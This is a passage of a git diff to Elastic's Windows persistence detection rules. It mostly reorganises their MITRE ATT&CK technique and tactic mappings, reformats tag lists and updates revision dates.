Monitoring", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -92,26 +83,26 @@ iam where host.os.type == "windows" and event.code == "4738" and winlog.event_da [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1558" -name = "Steal or Forge Kerberos Tickets" -reference = "https://attack.mitre.org/techniques/T1558/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_msi_installer_task_startup.toml b/rules/windows/persistence_msi_installer_task_startup.toml index 240595008a9..cb71605d295 100644 --- a/rules/windows/persistence_msi_installer_task_startup.toml +++ b/rules/windows/persistence_msi_installer_task_startup.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/01" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -126,27 +126,12 @@ Windows Installer, through msiexec.exe, facilitates software installation and co [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" -[[rule.threat.technique.subtechnique]] -id = "T1053.005" -name = "Scheduled Task" -reference = "https://attack.mitre.org/techniques/T1053/005/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.007" name = "Msiexec" @@ -156,3 +141,31 @@ reference = "https://attack.mitre.org/techniques/T1218/007/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.005" +name = "Scheduled Task" +reference = "https://attack.mitre.org/techniques/T1053/005/" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.001" +name = "Registry Run Keys / Startup Folder" +reference = "https://attack.mitre.org/techniques/T1547/001/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/persistence_msoffice_startup_registry.toml b/rules/windows/persistence_msoffice_startup_registry.toml index 6be85a0e79a..feec07ffa4f 100644 --- a/rules/windows/persistence_msoffice_startup_registry.toml +++ b/rules/windows/persistence_msoffice_startup_registry.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/22" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "windows"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -63,20 +63,7 @@ references = [ risk_score = 21 rule_id = "14dab405-5dd9-450c-8106-72951af2391f" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Data Source: Sysmon", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -88,31 +75,18 @@ registry where host.os.type == "windows" and event.action != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1137" name = "Office Application Startup" reference = "https://attack.mitre.org/techniques/T1137/" + [[rule.threat.technique.subtechnique]] id = "T1137.002" name = "Office Test" reference = "https://attack.mitre.org/techniques/T1137/002/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/persistence_netsh_helper_dll.toml b/rules/windows/persistence_netsh_helper_dll.toml index ea1754b7177..d74ccf6386f 100644 --- a/rules/windows/persistence_netsh_helper_dll.toml +++ b/rules/windows/persistence_netsh_helper_dll.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "windows", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -87,31 +87,18 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.007" name = "Netsh Helper DLL" reference = "https://attack.mitre.org/techniques/T1546/007/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml b/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml index 70d8729bfdc..0f4533e272c 100644 --- a/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml +++ b/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/15" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -68,21 +68,7 @@ references = [ risk_score = 47 rule_id = "ce64d965-6cb0-466d-b74f-8d2c76f47f05" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -94,36 +80,13 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.002" -name = "Additional Email Delegate Permissions" -reference = "https://attack.mitre.org/techniques/T1098/002/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/persistence_powershell_profiles.toml b/rules/windows/persistence_powershell_profiles.toml index 419fec79e13..78f2542e3ac 100644 --- a/rules/windows/persistence_powershell_profiles.toml +++ b/rules/windows/persistence_powershell_profiles.toml @@ -2,7 +2,7 @@ creation_date = "2022/10/13" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -110,20 +110,7 @@ references = [ risk_score = 47 rule_id = "5cf6397e-eb91-4f31-8951-9f0eaa755a31" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -141,36 +128,18 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.013" name = "PowerShell Profile" reference = "https://attack.mitre.org/techniques/T1546/013/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" -[[rule.threat.technique.subtechnique]] -id = "T1546.013" -name = "PowerShell Profile" -reference = "https://attack.mitre.org/techniques/T1546/013/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/persistence_priv_escalation_via_accessibility_features.toml b/rules/windows/persistence_priv_escalation_via_accessibility_features.toml index 9cb6a3c5279..cc52c54c402 100644 --- a/rules/windows/persistence_priv_escalation_via_accessibility_features.toml +++ b/rules/windows/persistence_priv_escalation_via_accessibility_features.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "m365_defender"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -106,17 +106,7 @@ references = ["https://www.elastic.co/blog/practical-security-engineering-statef risk_score = 73 rule_id = "7405ddf1-6c8e-41ce-818f-48bea6bcaed8" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint"] timestamp_override = "event.ingested" type = "eql" @@ -154,36 +144,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.008" name = "Accessibility Features" reference = "https://attack.mitre.org/techniques/T1546/008/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.008" name = "Accessibility Features" reference = "https://attack.mitre.org/techniques/T1546/008/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/persistence_registry_uncommon.toml b/rules/windows/persistence_registry_uncommon.toml index 477f8078256..eb9b4bf0b71 100644 --- a/rules/windows/persistence_registry_uncommon.toml +++ b/rules/windows/persistence_registry_uncommon.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -153,41 +153,53 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[[rule.threat.technique]] +id = "T1176" +name = "Software Extensions" +reference = "https://attack.mitre.org/techniques/T1176/" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.002" name = "Screensaver" reference = "https://attack.mitre.org/techniques/T1546/002/" +[[rule.threat.technique.subtechnique]] +id = "T1546.012" +name = "Image File Execution Options Injection" +reference = "https://attack.mitre.org/techniques/T1546/012/" [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" +[[rule.threat.technique.subtechnique]] +id = "T1547.004" +name = "Winlogon Helper DLL" +reference = "https://attack.mitre.org/techniques/T1547/004/" +[[rule.threat.technique.subtechnique]] +id = "T1547.014" +name = "Active Setup" +reference = "https://attack.mitre.org/techniques/T1547/014/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/persistence_remote_password_reset.toml b/rules/windows/persistence_remote_password_reset.toml index 9bfbeba67ac..e16151644d7 100644 --- a/rules/windows/persistence_remote_password_reset.toml +++ b/rules/windows/persistence_remote_password_reset.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/18" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -63,15 +63,7 @@ references = [ risk_score = 47 rule_id = "2820c9c2-bcd7-4d6e-9eba-faf3891ba450" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Impact", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -97,26 +89,26 @@ sequence by winlog.computer_name with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1531" -name = "Account Access Removal" -reference = "https://attack.mitre.org/techniques/T1531/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml b/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml index 5152e42debf..fbae1bd3fd4 100644 --- a/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml +++ b/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -89,19 +89,13 @@ sequence by host.id, user.name with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" -[[rule.threat.technique.subtechnique]] -id = "T1547.001" -name = "Registry Run Keys / Startup Folder" -reference = "https://attack.mitre.org/techniques/T1547/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml b/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml index d5fd087cd9d..d236449f23d 100644 --- a/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml +++ b/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml @@ -2,7 +2,7 @@ creation_date = "2022/02/24" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -79,16 +79,7 @@ Audit Directory Service Changes (Success) ``` """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Active Directory", - "Resources: Investigation Guide", - "Use Case: Active Directory Monitoring", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "eql" @@ -102,24 +93,36 @@ any where host.os.type == "windows" and event.code == "5136" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] -id = "T1078.002" -name = "Domain Accounts" -reference = "https://attack.mitre.org/techniques/T1078/002/" +id = "T1484.001" +name = "Group Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/001/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" +[[rule.threat.technique.subtechnique]] +id = "T1484.001" +name = "Group Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/001/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_service_dll_unsigned.toml b/rules/windows/persistence_service_dll_unsigned.toml index cbd24408d74..10040a4d61f 100644 --- a/rules/windows/persistence_service_dll_unsigned.toml +++ b/rules/windows/persistence_service_dll_unsigned.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/17" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -21,16 +21,7 @@ references = [ risk_score = 47 rule_id = "78ef0c95-9dc2-40ac-a8da-5deb6293a14e" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -167,53 +158,36 @@ Svchost.exe is a critical Windows process that hosts multiple services, allowing [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" -[[rule.threat.technique.subtechnique]] -id = "T1036.001" -name = "Invalid Code Signature" -reference = "https://attack.mitre.org/techniques/T1036/001/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1569" -name = "System Services" -reference = "https://attack.mitre.org/techniques/T1569/" -[[rule.threat.technique.subtechnique]] -id = "T1569.002" -name = "Service Execution" -reference = "https://attack.mitre.org/techniques/T1569/002/" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_service_windows_service_winlog.toml b/rules/windows/persistence_service_windows_service_winlog.toml index 99867689123..587b3378aff 100644 --- a/rules/windows/persistence_service_windows_service_winlog.toml +++ b/rules/windows/persistence_service_windows_service_winlog.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/30" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/12/11" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -97,15 +97,7 @@ This rule looks for suspicious services being created with suspicious traits com risk_score = 47 rule_id = "da87eee1-129c-4661-a7aa-57d0b9645fad" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Resources: Investigation Guide", - "Data Source: Windows Security Event Logs", - "Data Source: Windows System Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Windows Security Event Logs", "Data Source: Windows System Event Logs"] timestamp_override = "event.ingested" type = "eql" @@ -139,19 +131,36 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_services_registry.toml b/rules/windows/persistence_services_registry.toml index e142ec77150..ef840dc41aa 100644 --- a/rules/windows/persistence_services_registry.toml +++ b/rules/windows/persistence_services_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/10/07" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -117,31 +117,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/persistence_startup_folder_file_written_by_unsigned_process.toml b/rules/windows/persistence_startup_folder_file_written_by_unsigned_process.toml index 12ea89d5a27..3ca6ca332f6 100644 --- a/rules/windows/persistence_startup_folder_file_written_by_unsigned_process.toml +++ b/rules/windows/persistence_startup_folder_file_written_by_unsigned_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/29" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/03" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -100,15 +100,7 @@ This rule looks for unsigned processes writing to the Startup folder locations. risk_score = 47 rule_id = "2fba96c0-ade5-4bce-b92f-a5df2509da3f" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Defend"] type = "eql" query = ''' @@ -131,36 +123,18 @@ sequence by host.id, process.entity_id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" -[[rule.threat.technique.subtechnique]] -id = "T1036.001" -name = "Invalid Code Signature" -reference = "https://attack.mitre.org/techniques/T1036/001/" - - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/persistence_startup_folder_scripts.toml b/rules/windows/persistence_startup_folder_scripts.toml index 2458d45409b..9adfc9ad184 100644 --- a/rules/windows/persistence_startup_folder_scripts.toml +++ b/rules/windows/persistence_startup_folder_scripts.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -145,24 +145,18 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" -[[rule.threat.technique.subtechnique]] -id = "T1547.009" -name = "Shortcut Modification" -reference = "https://attack.mitre.org/techniques/T1547/009/" - - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/persistence_suspicious_com_hijack_registry.toml b/rules/windows/persistence_suspicious_com_hijack_registry.toml index 